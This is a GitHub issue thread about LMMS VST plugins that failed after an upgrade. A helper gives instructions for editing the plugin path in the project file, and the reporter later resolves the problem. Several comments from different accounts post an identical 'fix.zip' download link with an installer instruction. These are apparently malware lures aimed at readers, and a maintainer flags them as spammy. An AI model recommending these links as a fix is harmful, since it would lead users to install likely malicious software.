### ISSUE TITLE
VST plugin deleted / issue with plugin

### ISSUE THREAD

**Issue by Sanderr303** [LMMS/lmms#7469]
### System Information

Microsoft Windows [Version 10.0.19045.4780]

### LMMS Version(s)

lmms-1.3.0-alpha.1.685+gff8c47062-mingw-win64

### Most Recent Working Version

lmms-1.3.0-alpha.1.102%2Bg89fc6c960-mingw-win64

### Bug Summary

hi, at least 2 vst plugins not working. One is deleted during installation of 1.686 on a system where 1.102 was installed.
This vst was located in C:\Program Files (x86)\LMMS\plugins
The other vst is still present in C:\Vstplugins but is not working anymore. It does not gives an error when I select the dll using VeSTige but it is not loaded. 
Attached error messages when loading a song with this 2 plugings.

### Expected Behaviour

Keeping existing vst on installation new LMMS version and vst that was not deleted, should continue to work,

### Steps To Reproduce

Load the plugings using VeSTige

### Logs

<details>
<summary>Click to expand</summary>
<pre>
  
</pre>
</details>

### Screenshots / Minimum Reproducible Project

![afbeelding](https://github.com/user-attachments/assets/ad379b63-d4e3-4fe3-ac8b-e9ab5f75745c)

### Please search the issue tracker for existing bug reports before submitting your own.

- [X] I have searched all existing issues and confirmed that this is not a duplicate.

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Rossmaxx** [comment]
Deleted suspicious comments which contained likely spammy links

**Comment by musikBear** [comment]
> hi, at least 2 vst plugins not working. One is deleted during installation of 1.686 on a system where 1.102 was installed. This vst was located in C:\Program Files (x86)\LMMS\plugins The other vst is still present in C:\Vstplugins but is not working anymore. It does not gives an error when I select the dll using VeSTige but it is not loaded. Attached error messages when loading a song with this 2 plugings.

Doubt that.
Lmms never deletes anything, but there is most likely a hard-code entry in your project file.
It is not that difficult to find and to change, but you do need to be _careful_!
First do make a search with win-app-search for SuperWave.vst
If you actually do not find it, then ...i'm surprised and you can forget about all the nextcoming....
But you will find it :p -So..
*) save project as **MMP**!
You should now have TWO identical projects! The MMPZ works as backup
OBS NEVER open a MMPZ in a text-editor!!!
Open the MMP in notepad
Search for **SuperWave**
The entry will be in a chunk-tail, and look something like
AAAAAAABAAAAQQAAAAAAAAAAAAAAAAAAAAAAAAA="/>
It will be _significantly_ larger!
Localise the disk-path for SuperWave, copy it and paste it like
chunk-tail: AAAAAAABAAAAQQAAAAAAAAAAAAAAAAAAAAAAAAA="plugin="SuperWave VST.dll" program="0"/>
For Synth1 it should be:
plugin="Synth1/Synth1 VST.dll" program="0"
save the file
Open it in LMMS
What happens?

**Comment by Sanderr303** [comment]
Hi MusicBear, thanks for your quick and long answer!
At the time of submitting, both issues really did occur!
Now after reading you reply and my computer is rerstarted, I just openend a track with the superwave plugin and did not get the error I submitted. Then I checked the properties of superwave and found the actual file path in a subfolder of the plugns folder.
So I did overlook that one! And I now remembered that when I first time started lmms after the installation, the virusscanner alerted and checked some of the files. So maybe that blocked the loading. Allthough I did restarted LMMS a couple of times.
Also the other vst which did not work anymore, now just loads fine.

So this issue can be closed! I guess it as the virusscanner that caused the issue and after a restart, the issue was gone.

Thanks again

Sander
